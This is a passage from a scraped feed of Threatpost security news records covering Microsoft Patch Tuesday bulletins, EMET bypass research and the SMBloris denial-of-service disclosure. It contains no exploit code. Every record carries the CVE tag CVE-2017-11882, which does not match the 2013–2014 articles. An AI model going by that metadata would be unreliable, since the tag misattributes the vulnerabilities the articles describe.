today, [MS14-048](<https://technet.microsoft.com/library/security/MS14-048>), is in Microsoft OneNote 2007 digital note-taking software. It\u2019s rated important because it requires user interaction to trigger an exploit.\n\nThe remaining bulletins are all rated important by Microsoft and include four privilege elevation vulnerabilities, and a pair of security feature bypass bugs.\n\n * [MS14-044](<https://technet.microsoft.com/library/security/MS14-044>) patches two vulnerabilities in Microsoft SQL Server Master Data Services and SQL Server relational database management system. Users would have to be lured to a website that injects client-side script into IE that would exploit the bug.\n * [MS14-045](<https://technet.microsoft.com/library/security/MS14-045>) fixes three vulnerabilities in Windows kernel-mode drivers where an attacker who is logged in to a computer and runs malicious code could elevate privileges.\n * [MS14-049](<https://technet.microsoft.com/library/security/MS14-049>) patches a vulnerability in Windows Installer Service that could be exploited if an attacker has valid credentials and runs a malicious application that tries to repair a previously installed app.\n * [MS14-050](<https://technet.microsoft.com/library/security/MS14-050>) is the final privilege escalation bug, and it\u2019s found in SharePoint Server. An authenticated attacker would need a malicious app running JavaScript in the user\u2019s context on a vulnerable SharePopint site to exploit the issue.\n * [MS14-046](<https://technet.microsoft.com/library/security/MS14-046>) and [MS14-047](<https://technet.microsoft.com/library/security/MS14-047>) are security feature bypass vulnerabilities in .NET Framework and LRPC. Both bugs require certain circumstances be in place, but could lead to a bypass of Address Space Layout Randomization (ASLR) and remote code execution.\n", "cvss3": {}, "published": "2014-08-12T15:09:09", "type": "threatpost", "title": "August 2014 Microsoft Patch Tuesday Security Bulletins", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-08-12T19:09:09", "id": "THREATPOST:5D9785F30280BD09EB7E645CA2EECE79", "href": "https://threatpost.com/microsoft-keeps-focus-on-ie-security-with-patch-tuesday-updates/107729/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:58:37", "description": "Dennis Fisher and Mike Mimoso discuss the latest security news, including the possible fork of TrueCrypt, Microsoft\u2019s new information sharing platform, the FBI\u2019s cybercrime task force and the US team\u2019s crushing tie with Portugal.\n\nDownload: [digital_underground_156.mp3](<http://traffic.libsyn.com/digitalunderground/digital_underground_156.mp3>)\n\nMusic by Chris Gonsalves\n\n[![itunessub](https://media.threatpost.com/wp-content/uploads/sites/103/2014/11/07011443/itunessub.jpg)](<https://itunes.apple.com/us/podcast/digital-underground-podcast/id315355232?mt=2>)\n", "cvss3": {}, "published": "2014-06-23T15:17:13", "type": "threatpost", "title": "Threatpost News Wrap, June 23, 2014", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-11-25T15:52:47", "id": "THREATPOST:415E19FC1402E6223871B55143D39C98", "href": "https://threatpost.com/threatpost-news-wrap-june-23-2014/106812/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:16", "description": "Exploits bypassing Microsoft\u2019s Enhanced Mitigation Experience Toolkit, or EMET, are quickly becoming a parlor game for security researchers. With increasing frequency, white hats are poking holes in EMET, and to its credit, Microsoft has been quick to not only address those issues but challenge and reward researchers who successfully submit bypasses to its [bounty program](<http://threatpost.com/latest-microsoft-100000-bounty-winner-bypasses-aslr-dep-mitigations/104328>).\n\nThe tide may be turning, however, if the latest Internet Explorer zero day is any indication. An exploit used as part of the [Operation SnowMan espionage campaign](<http://threatpost.com/new-ie-10-zero-day-targeting-military-intelligence/104272>) against U.S. military targets contained a feature that checked whether an EMET library was running on the compromised host, and if so, the attack would not execute.\n\nThat\u2019s not the same as an in-the-wild exploit for EMET, but that may not be too far down the road, especially when you take into consideration two important factors: Microsoft continues to market EMET as an effective and temporary zero-day mitigation until a patch is released; and the impending end-of-life of Windows XP on April 8 could spark a surge in EMET installations as a stopgap.\n\nIn the meantime, the [EMET bypasses](<http://threatpost.com/researchers-develop-complete-microsoft-emet-bypass/104437>) keep on coming. The latest targeted a couple of mitigations in the [EMET 5.0 Technical Preview](<http://threatpost.com/emet-5-0-technical-preview-offers-secure-plug-in-control/104490>) released last week during RSA Conference 2014. Researchers at Exodus Intelligence refused to share much in the way of details on the exploit, preferring to offer it to its customers before making it available for public consumption. A tweet from cofounder and vice president of operations Peter Vreugdenhil said: \u201cEMET 5 bypassed with 20 ROP gadgets. ntdll only, esp points to heap containing fake stack, no other regs required. Adding to our feed soon.\u201d\n\nVreugdenhil is a fan of EMET, and is in the camp that believes hackers will be adding EMET bypasses to exploits within a year or two, despite the EMET module in Operation SnowMan, which he believes was added in order to keep the campaign from being detected as long as possible.\n\n\u201cI think most of the reason is that the return on investment for the bad guys is really not that high at this point,\u201d Vreugdenhil said. \u201cThat also means that by the time everybody actually uses [EMET] and the more ground it gains, the more likely it becomes that return on investment for the bad guys will be high enough for them to add it to their exploits.\u201d\n\nEMET provides users with a dozen [mitigations against memory-based exploits](<http://technet.microsoft.com/en-us/security/jj653751>), including ASLR, DEP, Export Address Table Filtering, Heapspray Allocation, and five return-oriented programming mitigations. ROP chains are the most effective bypass technique is use today, one that Vreugdenhil has used on a couple of occasions against EMET.\n\nWriting exploits targeting EMET, he said, is a little more involved than targeting a vulnerability in third-party software such as Flash or Java. Vreugdenhil said he generally starts with a publicly available exploit such as the latest IE 10 zero day and observes the crash the bug causes in order to understand how it corrupts memory and hopefully discloses memory that can be used to build an ROP chain. Microsoft\u2019s addition of Data Execution Prevention and ASLR in Windows Vista and Windows 7 prevents attackers from executing code in a particular memory location because those memory modules are now randomized.\n\n\u201cBack in Windows XP when there was no ASLR and no randomization of the modules, it was relatively easy. You would just pick a module and then reuse the code inside that module to still get code execution,\u201d Vreugdenhil said. \u201cWindows 7 came out and put the bar higher by shuffling the modules around, so theoretically, you didn\u2019t know where your modules were in the process. It theoretically should be impossible to point at an address and say \u2018Hey would you execute code at that address because I know there\u2019s something going to be there.\u2019\u201d\n\nIf an attacker can force a process to leak memory from inside back to an exploit, the attacker will be able to reuse that information and bypass ASLR and DEP because he will know where the memory module is located, Vreugdenhil said. From there, an attacker needs to figure out additional memory protections in place, and address those to control the underlying system.\n\n\u201cIn the case of EMET, there\u2019s a long list of protection mechanisms it adds, there\u2019s only two or three that could be a hindrance if you\u2019re writing a client-side IE exploit. And so it\u2019s usually just a matter of figuring out what they are and coming up with ways to sidestep them,\u201d Vreugdenhil said. \u201cIf we can do it, we assume there\u2019s many more people who can do it, and it\u2019s also going to be used by the bad guys anywhere between now and a year or two years.\u201d\n", "cvss3": {}, "published": "2014-03-05T10:07:31", "type": "threatpost", "title": "Researchers Investing in EMET Bypasses More than Hackers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-03-05T20:45:44", "id": "THREATPOST:212ACE7085CC094D6542F00AF0A4D1B4", "href": "https://threatpost.com/microsoft-emet-bypasses-realm-of-white-hats-for-now/104619/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:23", "description": "The expected continued respite from deploying Internet Explorer patches was apparently a mirage as Microsoft changed course from last Thursday\u2019s advance notification and added two more bulletins to the [February 2014 Patch Tuesday security updates](<http://technet.microsoft.com/en-us/security/bulletin/ms14-feb>), including the first IE rollup of 2014.\n\nIE had patched monthly for close to a year until the January security bulletins were released, and eyebrows were raised again last Thursday when there was no mention of an IE update.\n\nToday, however, Microsoft reversed course with [MS14-010](<https://technet.microsoft.com/en-us/security/bulletin/ms14-010>), which patches 24 vulnerabilities in the browser, including one that has been publicly disclosed. No active exploits have been reported, Microsoft said.\n\nAll of the vulnerabilities enable remote code execution, and affect versions of IE going back to IE 6 on Windows XP up to IE 11 on Windows 8.1. More than 20 CVEs involving memory corruption vulnerabilities in IE were addressed along with a cross-domain information disclosure vulnerability, an elevation of privilege vulnerability and a memory corruption issue related to VBScript that is addressed in [MS14-011](<https://technet.microsoft.com/en-us/security/bulletin/ms14-011>).\n\nA IE user would have to be lured to a website hosting an exploit for the vulnerability in the VBScript scripting engine in Windows. The engine improperly handles objects in memory, Microsoft said, and an exploit could corrupt memory and allow an attacker to run code on a compromised machine.\n\n\u201cTo go from five to seven bulletins says to me that initial testing was completed last minute so they decided to slip the patch in or testing found an issue and engineer shipped a fix last minute,\u201d said Tyler Reguly, manager of security research at Tripwire. \u201cEither way, pay extra attention to MS14-010 and MS14-011 in your test environments this month before you push them out enterprise wide.\u201d\n\nColleague Craig Young cautions that a number of the IE vulnerabilities can be combined to gain admin access on compromised machines.\n\n\u201cWithout any doubt, attacks in the wild will continue and expand to the other vulnerabilities being fixed today,\u201d Young said.\n\nAs promised, Microsoft did patch a remote code execution vulnerability, [MS14-008](<https://technet.microsoft.com/en-us/security/bulletin/ms14-008>), in its Forefront Protection for Exchange 2010 security product. Microsoft said it removed the offending code from the software.\n\n\u201cI\u2019m sure a lot of people will call attention to the Forefront Protection for Exchange patch this month. However when Microsoft, the people with the source code, tells us they can\u2019t trigger the vulnerability in a meaningful way, I intend to believe them,\u201d said Tripwire\u2019s Reguly. \u201cI suspect we\u2019ll wake up tomorrow and beyond pressing apply, we\u2019ll forget this was even released.\u201d\n\nMicrosoft stopped updating Forefront for Exchange as of September 2012, but will support it with security updates for another 22 months\n\n\u201cThis should make administrators think about upgrading their Exchange servers to the latest version (which includes basic anti-malware protection by default) or consider a third party email security application,\u201d said Russ Ernst of Lumension. \u201cAdministrators that currently use Forefront Protection for Exchange have until December 2015 to get this done.\u201d\n\nThe final critical bulletin, [MS14-007](<https://technet.microsoft.com/en-us/security/bulletin/ms14-007>), is another remote code execution bug in Direct2D, which can only be triggered viewing malicious content in IE. Direct2D is a graphics API used for rendering 2-D geometry, bitmaps and text, Microsoft said. This vulnerability affects Windows 7 through Windows 8.1.\n\nMicrosoft also released three bulletins rated important that patch privilege elevation, information disclosure and denial of service vulnerabilities.\n\n * [MS14-009](<https://technet.microsoft.com/en-us/security/bulletin/ms14-009>) patches two publicly disclosed bugs in the .NET framework that could allow an attacker to elevate their privileges on a compromised machine.\n * [MS14-005](<https://technet.microsoft.com/en-us/security/bulletin/ms14-005>) handles a vulnerability in Microsoft XML Core Services that could lead to information disclosure if the victim visits a malicious site with IE.\n * [MS14-006](<https://technet.microsoft.com/en-us/security/bulletin/ms14-006>) addresses a denial-of-service vulnerability in Windows 8, RT, and Server 2012, that has been publicly disclosed. An attacker would have to send a large number of malicious IPv6 packets to a vulnerable system to exploit the bug, and the attacker must be on the same subnet as the victim.\n\nMicrosoft also sent out an update that officially [deprecates the use of the MD5 hash algorithm](<http://threatpost.com/light-microsoft-patch-load-precedes-md5-deprecation/104104>). Digital certificates with MD5 hashes issued under roots in the Microsoft root certificate program are from now on restricted.\n\n\u201cCertificates with MD5 hashes should no longer be considered safe,\u201d said Dustin Childs, group manager, Microsoft Trustworthy Computing. \u201cWe\u2019ve given our customers six months to prepare their environments, and now this update is available through automatic updates.\u201d\n", "cvss3": {}, "published": "2014-02-11T14:19:34", "type": "threatpost", "title": "February 2014 Microsoft Patch Tuesday Security Bulletins", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-02-11T19:19:34", "id": "THREATPOST:5E4874778A3B5A26CF2755C59BA3A7A8", "href": "https://threatpost.com/microsoft-adds-critical-ie-patches-under-the-wire/104214/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:33", "description": "Microsoft announced Thursday that it plans to release four bulletins next week as part of the year\u2019s first batch of [Patch Tuesday security updates](<http://blogs.technet.com/b/msrc/archive/2014/01/09/advance-notification-service-for-the-january-2014-security-bulletin-release.aspx>), none of which are rated critical.\n\nDespite the relatively light load, the patches do address a [zero-day vulnerability in Windows XP and Windows Server 2003](<http://threatpost.com/latest-xp-zero-day-renews-calls-to-move-off-the-os/103058>) made public in early November. Hackers were actively exploiting the [flaw in the ND Proxy driver that manages Microsoft\u2019s Telephony API](<http://threatpost.com/microsoft-to-patch-tiff-zero-day-wait-til-next-year-for-xp-zero-day-fix/103117>) on XP via infected PDF attachments. Exploits work only in conjunction with an Adobe Reader vulnerability that has since been patched.\n\nIn addition to Microsoft patches, expect a fresh batch of Adobe patches as well as Oracle\u2019s quarterly Critical Patch Update, which is generally a massive patch rollout that now includes Java patches.\n\nThe Microsoft bulletins will address vulnerabilities in Windows, Office and Dynamics AX, all which Microsoft has deemed important, including the zero-day fixes.\n\n\u201cIt\u2019s only rated important for a variety of reasons, including the fact that Microsoft will end support for XP in April,\u201d said Russ Ernst, a director of product management at Lumension. \u201cIf you\u2019re still using XP, this will be an important patch to deploy. And, hopefully you are working on your migration plan.\u201d\n\nAccording to a post on Microsoft\u2019s Security Response Center blog by Dustin Childs, MS14-002, will address the zero day, and he acknowledged they were working on a patch for the issue \u2013 which stems from a vulnerability in the kernel and allows local privilege escalation and access to the kernel \u2013 back in December.\n\n\u201cWe have only seen this issue used in conjunction with a PDF exploit in targeted attacks, and not on its own,\u201d Childs said.\n\nMicrosoft has used the zero-day vulnerability as a prime opportunity to urge [Windows users to migrate off XP](<http://threatpost.com/microsoft-xp-end-of-life-an-important-security-milestone/102789>). The company previously announced its plans to effectively end support for the operating system on April 8.\n\nThe first bulletin will address a remote code execution in Microsoft\u2019s Sharepoint Server and Microsoft Word, the third will fix an elevation of privilege in Windows 7 and Server 2008 R2 and the last bulletin will fix a denial of service (DoS) issue in Microsoft\u2019s enterprise resource planning software, Dynamics AX.\n\nPer usual Microsoft will push updates for the software in question next Tuesday and post patch analysis and deployment guidance on its Security Response Center blog.\n", "cvss3": {}, "published": "2014-01-09T13:02:31", "type": "threatpost", "title": "Microsoft to Patch Zero Day in January 2014 Security Updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-01-14T19:04:09", "id": "THREATPOST:98BE42759F35CD829E6BD3FAC7D5D1D5", "href": "https://threatpost.com/microsoft-expected-to-patch-xp-zero-day-on-patch-tuesday/103591/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:59:43", "description": "Microsoft will, next week, patch a [zero-day vulnerability in its GDI+ graphics component](<http://threatpost.com/microsoft-warns-of-targeted-attacks-on-windows-0-day/102821>) being exploited in targeted attacks in the Middle East and Asia.\n\nThe zero day has sat unpatched since it was made public Nov. 5; Microsoft did release a FixIt tool as a temporary mitigation. The patch is one of 11 bulletins Microsoft said today it will release as part of its [December 2013 Patch Tuesday security updates](<http://technet.microsoft.com/en-us/security/bulletin/ms13-dec>); five of the bulletins will be rated critical.\n\nMicrosoft did confirm, however, that a [zero day in the NDProxy driver](<http://threatpost.com/latest-xp-zero-day-renews-calls-to-move-off-the-os/103058>) that manages the Microsoft Telephony API on Windows XP systems will not be patched. That zero day is also being exploited in the wild alongside a PDF exploit of a patched Adobe Reader flaw.\n\nThe GDI+ vulnerability is found in several versions of Windows and Office and enables an attacker to gain remote-code execution, but only on Windows Vista, Windows Server 2008, and Office 2003 through 2010. The vulnerability exists in the way the GDI+ component handles TIFF images. Microsoft said an attacker would have to entice a victim to preview or open a malicious TIFF attachment or visit a website hosting the exploit image.\n\nTuesday\u2019s critical patches address remote code execution vulnerabilities in a number of Microsoft products, including not only Windows and Office, but Lync, Internet Explorer and Exchange. Vulnerabilities in SharePoint, Lync, SingnalR and ASP.NET are among those rated important by Microsoft. Those vulnerabilities are primarily privilege escalation issues as well as an information disclosure bug.\n\nThis will be the last scheduled release of security updates from Microsoft for the year. It looks like Tuesday\u2019s updates will bring the 2013 count to 106 bulletins, up sharply from 83 last year, according to Qualys CTO Wolfgang Kandek. Microsoft had similar numbers of bulletins in 2011 (100) and 2010 (106).\n\n\u201cRegarding 0-days, Microsoft has consistently pointed out that the additional security toolkit EMET (Enhanced Mitigation Experience Toolkit) has been effective against all of the 0-day problems this year,\u201d Kandek said. \u201cWe believe it is a proactive security measure that organizations should evaluate and consider as an additional layer in their defensive measures.\u201d\n\nThe XP zero-day, meanwhile, will likely be left for the January 2014 Patch Tuesday updates. The vulnerability is a privilege escalation vulnerability and allows kernel access.\n\nFireEye researchers said they found the exploit in the wild being used [alongside a PDF-based exploit](<http://www.fireeye.com/blog/technical/cyber-exploits/2013/11/ms-windows-local-privilege-escalation-zero-day-in-the-wild.html>) against a patched Adobe Reader vulnerability. Reader versions 9.5.4, 10.1.6, 11.0.02 and earlier on XP SP3 are affected, later versions are not, FireEye said, adding that this exploit gives a local user the ability to execute code in the kernel, such as install new software, manipulate data, or create new accounts. The exploit cannot be used remotely, the company said.\n\nMicrosoft recommended deleting the NDProxy.sys driver as a workaround; the mitigation, however, will impact TAPI operations.\n\n\u201cSystem administrators everywhere must have made Microsoft\u2019s naughty list because this holiday \u2018gift\u2019 is clearly a lump of coal,\u201d said Tyler Reguly, technical manager of security research and development at Tripwire. \u201cMicrosoft is wrapping up the 2013 patch season with anything that was laying around. Someone should tell Microsoft they forgot to include the kitchen sink.\u201d\n", "cvss3": {}, "published": "2013-12-05T16:07:42", "type": "threatpost", "title": "TIFF Zero Day Patch Among December 2013 Microsoft updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-12-05T21:07:43", "id": "THREATPOST:1256E9A9997A1C51E9DB7AEB7A420D3D", "href": "https://threatpost.com/microsoft-to-patch-tiff-zero-day-wait-til-next-year-for-xp-zero-day-fix/103117/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:20", "description": "Microsoft announced Wednesday afternoon that it has pulled [MS13-061](<https://technet.microsoft.com/en-us/security/bulletin/ms13-061>), one of the patches issued yesterday for vulnerabilities in Exchange Server 2013.\n\nMicrosoft said the patch is causing issues with the content index for mailbox databases. Organizations would still be able to send and receive email, but would not be able to search for messages on the server.\n\n\u201cAfter the installation of the security update, the content index for mailbox databases shows as Failed and the Microsoft Exchange Search Host Controller service is renamed,\u201d Microsoft principal program manager Ross Smith said in a [post](<http://blogs.technet.com/b/exchange/archive/2013/08/14/exchange-2013-security-update-ms13-061-status-update.aspx>) on the company\u2019s Exchange site.\n\nSmith added that patches for Exchange 2007 and 2010 were not pulled back because both use a different indexing architecture and are not impacted.\n\nOrganizations that have already installed the patch are urged to follow the steps outlined in a [Knowledge Base article](<http://support.microsoft.com/kb/2879739>) released today as a workaround until a new patch is available. The workaround involves the editing of two separate registry keys.\n\nExperts, however, think the number of companies immediately applying the patch could be relatively low given the criticality of Exchange servers to enterprises. Most likely, an Exchange patch, even a critical one, would have been reserved for a maintenance window overnight or on a weekend.\n\nThe patch was essentially the integration of an Oracle patch released last month for Outside In, a technology that turns unstructured file formats such as PDFs into normalized files. Outside In is part of Exchange\u2019s WebReady Document Viewing and Data Loss Prevention features.\n\nAn attacker would be able to exploit the vulnerability in question if a user opened or previewed a malicious file attachment using Outlook Web Access (OWA) giving the attacker the same privileges as the victim on the Exchange Server.\n\n\u201cThis is a fairly important patch in terms of criticality given that it\u2019s the mail server and not a workstation,\u201d said Qualys CTO Wolfgang Kandek.\n\nThe issue is amplified because with the OWA module on Exchange, the browser pulls a message into Exchange and using Outside In, processes the message on Exchange exposing the server to attack.\n\nKandek said organizations that don\u2019t allow OWA or turn off a visualization mode that renders documents are not affected; documents such as PDFs instead would be processed by a reader such as Adobe or Foxit avoiding the attack vector.\n\nIn the meantime, Kandek said he hopes Microsoft is transparent about the reason for faulty patch and why it wasn\u2019t caught in testing.\n\n\u201cI think it\u2019s important because we tell people they should install patches as quickly as possible,\u201d Kandek said. \u201cWhen a patch breaks, that\u2019s an issue.\u201d\n\nThe Exchange patch was one of three critical bulletins sent out yesterday in Microsoft\u2019s August Patch Tuesday updates.\n", "cvss3": {}, "published": "2013-08-14T16:51:00", "type": "threatpost", "title": "Faulty Microsoft Exchange Server 2013 Patch Pulled Back", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-08-14T20:51:00", "id": "THREATPOST:44FF4D429457B43FB0FEA96C9A0DE58C", "href": "https://threatpost.com/microsoft-pulls-back-critical-exchange-server-2013-patch/101999/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:20", "description": "Microsoft took less than a month to incorporate an [Oracle Outside In patch](<http://threatpost.com/hefty-oracle-july-critical-patch-update-contains-89-patches/101370>) and fix a critically rated remote code execution bug in Exchange Servers. The Microsoft patch is among three critical bulletins\u2014eight overall\u2014released today as part of [its August 2013 Patch Tuesday security updates](<http://blogs.technet.com/b/msrc/archive/2013/08/13/leaving-las-vegas-and-the-august-2013-security-updates.aspx>).\n\nOracle patched Outside In with its [July Critical Patch Update (CPU)](<http://www.oracle.com/technetwork/topics/security/cpujuly2013-1899826.html#AppendixFMW>); the technology allows developers to turn unstructured file formats into normalized files. [MS13-061](<https://technet.microsoft.com/en-us/security/bulletin/ms13-061>) includes the Outside In Patch, which is part of the WebReady Document Viewing and Data Loss Prevention features on Exchange Servers. Exploits could allow an attacker to remotely execute code if a user previews or opens a malicious file using Outlook Web App (OWA). The attacker would have the same privileges as the transcoding services on the Exchange Server; that would be the LocalService account for WebReady Document Viewing and the Filtering Management service for the DLP feature. Both, however, run with minimal privileges.\n\n\u201cIf you run Exchange and your users have OWA, you should address this issue as quickly as possible,\u201d said Qualys CTO Wolfgang Kandek. Microsoft also recommends a workaround that turns off Outside In document processing.\n\n[MS13-059](<https://technet.microsoft.com/en-us/security/bulletin/ms13-059>) is another cumulative patch for Internet Explorer and repairs 11 remotely executable vulnerabilities in the browser, including a sandbox bypass vulnerability discovered and exploited by VUPEN researchers during the Pwn2Own contest in March. IE 6-10 is vulnerable to exploit; Microsoft said it is not aware of any active exploits for any of these vulnerabilities.\n\nThe IE rollup includes patches for nine memory corruption vulnerabilities, as well as fixes for a privilege escalation flaw in the way in which the browser handles process integrity level assignment and an information disclosure cross-site scripting vulnerability in EUC-JP character encoding, Microsoft said.\n\n\u201cAs usual with IE vulnerabilities, the attack vector would be a malicious webpage, either exploited by the attacker or it could be sent to the victim in a spear-phishing e-mail,\u201d Kandek said. \u201cPatch this immediately as the highest priority on your desktop system and wherever your users browse the web.\u201d\n\nThe final critical bulletin, [MS13-060](<https://technet.microsoft.com/en-us/security/bulletin/ms13-060>), patches a Windows vulnerability in the Unicode Scripts Processor; the patch corrects the way Windows parses certain OpenType font characteristics. An exploit could allow an attacker to run code remotely if a user opens a malicious document or visits a website that supports OpenType fonts.\n\n\u201cA user would have to be induced to open a malicious file and this only affects Windows XP and 2003,\u201d said Ross Barrett, senior manager of security engineering at Rapid7. \u201cBoth of these issues should be patched ASAP.\u201d Microsoft also recommends two workarounds: either modifying the usp10.dll Access Control List to be more restrictive, or disabling support for parsing embedded fonts in IE.\n\nThe remaining bulletins were all rated Important by Microsoft.\n\n * [MS13-062](<https://technet.microsoft.com/en-us/security/bulletin/ms13-062>) patches a privilege escalation vulnerability in Windows RPC, correcting the manner in which Windows handles asynchronous RPC messages. \u201cPerhaps the most genuinely interesting vulnerability this month,\u201d Barrett said, adding that the bug is a post authentication issue in RPC. \u201cMicrosoft has described this as extremely difficult to exploit, which I can only assume is a challenge to exploit writers everywhere to prove them wrong.\u201d\n * [MS13-063](<https://technet.microsoft.com/en-us/security/bulletin/ms13-063>) is another privilege escalation issue in the Windows kernel. Four vulnerabilities are patched in this bulletin, the most severe of which enables elevated privileges if an attacker is able to log in locally and run a malicious application. In addition to memory corruption bugs, one of the vulnerabilities in this bulletin enables an attacker to bypass Address Space Layout Randomization (ASLR), a memory protection native to the OS.\n * [MS13-064](<https://technet.microsoft.com/en-us/security/bulletin/ms13-064>) patches a denial of service vulnerability in Windows NAT Driver. An attacker would have to send a malicious ICMP packet to a server running the NAT Driver services in order to exploit this bug, which affects only Windows Server 2012.\n * [MS13-065](<https://technet.microsoft.com/en-us/security/bulletin/ms13-065>) also fixes a denial of service bug in ICMPv6; Vista, Windows Server 2008, Windows &, Windows 8, Windows RT and Windows Server 2012 are affected by this bug.\n * [MS13-066](<https://technet.microsoft.com/en-us/security/bulletin/ms13-066>) patches an information-disclosure vulnerability in Active Directory Federation Services on Windows Server 2008 and Windows Server 2012. An exploit could force the service to leak information on the service and allow an attacker to use that information to try to log in remotely.\n", "cvss3": {}, "published": "2013-08-13T14:28:51", "type": "threatpost", "title": "August 2013 Microsoft Patch Tuesday Security Updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-08-13T18:28:51", "id": "THREATPOST:270516BE92D218A333101B23448C3ED3", "href": "https://threatpost.com/microsoft-august-patch-tuesday-addresses-critical-ie-exchange-and-windows-flaws/101981/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:00:22", "description": "Another month, another set of [Microsoft Patch Tuesday security updates](<http://technet.microsoft.com/en-us/security/bulletin/ms13-aug>) for Internet Explorer.\n\nFor what seems to be the umpteenth month in a row, Microsoft will patch its browser, one of three critical updates expected to be shipped on Tuesday among eight bulletins.\n\nWhile IE patches remain a constant in 2013, IT administrators and network managers also need to be aware of a critical set of patches for Microsoft Exchange Server 2013, as well as 2010 and 2007, both of which are on Service Pack 3.\n\nThe critical bugs in IE, Exchange Server and the Windows OS are all rated critical because they are remotely exploitable; it\u2019s unknown today how many are being actively exploited.\n\n\u201cAcross the board, all supported versions of Microsoft Exchange Server are affected by a critical vulnerability,\u201d said Tripwire security researcher Craig Young. \u201cIf I remember correctly, the last time we saw this was back in February when it was revealed that the transcoding service used to render content for Outlook Web Access sessions could be abused for remote code execution in the context of that service. Exchange servers are invariably connected to the Internet in some form or another so it\u2019s going to be urgent to patch this one post-haste.\u201d\n\n[MS13-012](<http://technet.microsoft.com/en-us/security/bulletin/ms13-012>), released in February, patched [vulnerabilities in the Exchange WebReady Document Viewing](<http://threatpost.com/microsoft-patches-critical-ie-vulnerabilities-021213/77519>) feature; if a user viewed a malicious file through OWA in a browser, an attacker could run code on the Exchange server remotely or crash the server.\n\nRoss Barrett, senior manager of security engineering at Rapid7, said the Exchange patches should be of the greatest concern to organizations.\n\n\u201cIf this is truly a remotely exploitable issue that does not require user interaction, then it\u2019s a potentially wormable issue and definitely should be put at the top of the patching priority list,\u201d Barrett said.\n\nIE, meanwhile, is about to be patched for the eighth time this year including an [out-of-band patch](<http://threatpost.com/out-band-ie-patch-released-more-sites-attacked-011413/77403>) in January to address exploits being used in a number of watering hole attacks.\n\nThe third critical bulletin addresses vulnerabilities in Windows XP and Windows Server 2003 that are remotely exploitable.\n\n\u201cFor some organizations this patch may be of less concern, if they have already moved to newer Windows versions,\u201d Barrett said.\n\nThe remaining bulletins are rated \u201cImportant\u201d by Microsoft based on whether they are remotely exploitable and whether exploits are in the wild. All of the \u201cImportant\u201d bulletins patch vulnerabilities in Windows; two of them are privilege escalation bugs, two are denial-of-service vulnerabilities and one information disclosure flaw.\n", "cvss3": {}, "published": "2013-08-08T15:28:06", "type": "threatpost", "title": "August 2013 Microsoft Patch Tuesday Security Updates", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-08-16T18:07:04", "id": "THREATPOST:4C788DAABFE70AE1D1483D4039B3767E", "href": "https://threatpost.com/critical-ie-exchange-updates-on-tap-in-august-patch-tuesday-release/101943/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:21", "description": "LAS VEGAS\u2014A 20-year-old Windows SMB vulnerability is expected to be disclosed Saturday during a talk at DEF CON.\n\nMicrosoft has said it will not patch the vulnerability, which allows an attacker to remotely crash a Windows server with relative ease using only 20 lines of Python code and a Raspberry Pi.\n\nThe vulnerability affects every version of the SMB protocol and every Windows version dating back to Windows 2000. It was likely introduced into the operating system much earlier, said Sean Dillon, senior security researcher at RiskSense. Dillon, who conducted his research with colleague Zach Harding, called the attack SMBloris because it is comparable to [Slowloris](<https://threatpost.com/mitigating-slowloris-http-dos-attack-062209/72845/>), a 2009 attack developed by [Robert Hansen](<http://ha.ckers.org/blog/20090617/slowloris-http-dos/>). Both attacks can use a single machine to crash or freeze a much more powerful server, but Slowloris, unlike SMBloris, targets webservers.\n\n\u201cSimilar to Slowloris, it requires opening many connections to the server, but these are low-cost connections for the attacker, so a single machine is able to perform the attack,\u201d Dillon said.\n\nDillon was among the first researchers to analyze EternalBlue, the leaked NSA SMB exploit that was used to spread the WannaCry ransomware attack and ExPetr wiper malware. It was during that analysis that Dillon uncovered this issue.\n\n\u201cWhile working on EternalBlue, we observed a pattern in the way memory allocations were done on the non-paged pool of the Windows kernel. The non-paged pool is memory that has to be reserved in physical RAM; it can\u2019t be swapped out,\u201d Dillon explained. \u201cThat\u2019s the most precious pool of memory on the system. We figured out how to exhaust that pool, even on servers that are very beefy, even 128 GB of memory. We can take that down with a Raspberry Pi.\u201d\n\nThe issue was privately reported to Microsoft in early June as the EternalBlue analysis was completed, Dillon said. Microsoft told the researchers that two internal security teams concluded the vulnerability was a moderate issue and would not be moved into the 